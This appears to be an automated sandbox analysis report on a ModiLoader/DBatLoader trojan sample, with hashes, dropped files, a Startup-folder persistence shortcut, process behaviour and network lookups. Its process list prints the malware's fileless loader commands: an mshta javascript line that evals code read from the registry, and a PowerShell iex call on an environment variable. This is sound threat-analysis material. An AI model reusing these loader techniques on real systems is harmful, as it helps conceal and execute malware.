SHA512 571d0720f495a92114cdce0abbf951bd3ac6f66394adc88964c3870feb2552640290d65bf739c9e844e4f0c33ddbda9e39f6e66cfaad8a4b35a210df05efe1b0

C:\Users\Admin\AppData\Roaming\158f4\93aca.cc93a6

MD5 224a96698095259ab707c64e8a2e5d18
SHA1 81e13fecd84dd76b74072f7b63c2d8713a5b80cf
SHA256 de91e37447860f1ae60170bcd269090568a29f45354db3fbed93087efd147ea9
SHA512 fb5afc8ed1a420644c254a009936a77ffe6f1afd7b7169e46095444ac5217dac805319ba417a2ad4b450a2a55f9a99b84677ced81420a284021a692668e3e296

C:\Users\Admin\AppData\Local\ed3e8\d468b.lnk

MD5 625f54a2fef23c3a3d59e2c950ba65c6
SHA1 0ac958e936b708c89a364d56513b85fa89b98b07
SHA256 c0bf9ed2ce41a218807ca8ed0ed6587fe2388d6e82bfa489f4d6f799cf662e6b
SHA512 a1f3b67b7eafa29f9a4925999aca67fa98fafb8dbe055b8d6d01e72402f4e0a3e8e8d283e39a1e3abb856ebf42dcceee74756bde9c0e16e7747c3389d1d1866f

C:\Users\Admin\AppData\Local\ed3e8\5cad4.cc93a6

MD5 8c5d76dc8913b4b9d779139bd98bc4aa
SHA1 8ecd0b54ac32c24bb3c1d06e5151295ce0ef09b4
SHA256 f6aa8866c2b49ba839275ebb0d0d17630ae63d20987d523037bd632575ae1330
SHA512 443b2be513599d9434168634de7fbf317aa637a0f5a89c4e6c80fd62fc68cf032a1ee6ae333f24de7701caf9e510f46ff5f0c83302266d748fa92bfb8bf2b242

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2d7d1.lnk

MD5 bebc26141e049d539319bb30b6b54d9e
SHA1 1d3d6261dc5cc68a1e7a9c718a8e177e3b5b31ea
SHA256 150bec976ac8a8e49819cb833b76a72d3e5452aece6c317c91e894a171347951
SHA512 85e16016a0e8d19c361a657f5605b38cf00e507b5f18cb58ed40ccb036266207a0558f418b7471c4fe3a1e1ba0234613b67933689c87fb26925cab629f593a8a

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-05 15:06

Reported

2024-05-05 15:09

Platform

win10v2004-20240419-en

Max time kernel

145s

Max time network

101s

Command Line

"C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe"

Signatures

ModiLoader, DBatLoader

trojan modiloader

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\mshta.exe

ModiLoader Second Stage

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3726321484-1950364574-433157660-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2124 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 2124 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 2124 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 2124 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 2124 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 2124 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 2124 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 2124 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 2124 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 2124 wrote to memory of 4908 N/A C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe
PID 1680 wrote to memory of 944 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 944 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 1680 wrote to memory of 944 N/A C:\Windows\system32\mshta.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\183da5248aa31d95f9462a9b49c50b36_JaffaCakes118.exe"

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" javascript:SLXp58v="TNvv7Q4";t3C8=new%20ActiveXObject("WScript.Shell");cU2ai="xEkfOZ";D8SnO=t3C8.RegRead("HKLM\\software\\Wow6432Node\\JoCuqBt1I\\VvwOn0Rh8");GG1JXu5="42oXN";eval(D8SnO);Tu0ZNC1LQ="SUq";

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:bxmapity

Network

Country Destination Domain Proto
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 68.32.126.40.in-addr.arpa udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 103.169.127.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 142.126.19.2.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 137.191.110.104.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/4908-2-0x0000000000400000-0x000000000043A000-memory.dmp

memory/4908-4-0x0000000000400000-0x000000000043A000-memory.dmp

memory/4908-5-0x0000000000400000-0x000000000043A000-memory.dmp

memory/4908-6-0x0000000000A70000-0x0000000000B46000-memory.dmp

memory/4908-10-0x0000000000A70000-0x0000000000B46000-memory.dmp

memory/4908-8-0x0000000000A70000-0x0000000000B46000-memory.dmp

memory/4908-9-0x0000000000A70000-0x0000000000B46000-memory.dmp

memory/4908-7-0x0000000000A70000-0x0000000000B46000-memory.dmp

memory/4908-11-0x0000000000A70000-0x0000000000B46000-memory.dmp

memory/4908-12-0x0000000000A70000-0x0000000000B46000-memory.dmp

memory/944-14-0x0000000005140000-0x0000000005176000-memory.dmp

memory/944-15-0x00000000057C0000-0x0000000005DE8000-memory.dmp

memory/944-16-0x0000000005760000-0x0000000005782000-memory.dmp

memory/944-17-0x0000000005F60000-0x0000000005FC6000-memory.dmp

memory/944-18-0x0000000005FD0000-0x0000000006036000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jtj2hegb.nwc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/944-28-0x0000000006040000-0x0000000006394000-memory.dmp

memory/944-29-0x0000000006520000-0x000000000653E000-memory.dmp

memory/944-30-0x0000000006540000-0x000000000658C000-memory.dmp

memory/944-31-0x0000000007E50000-0x00000000084CA000-memory.dmp

memory/944-32-0x0000000006A10000-0x0000000006A2A000-memory.dmp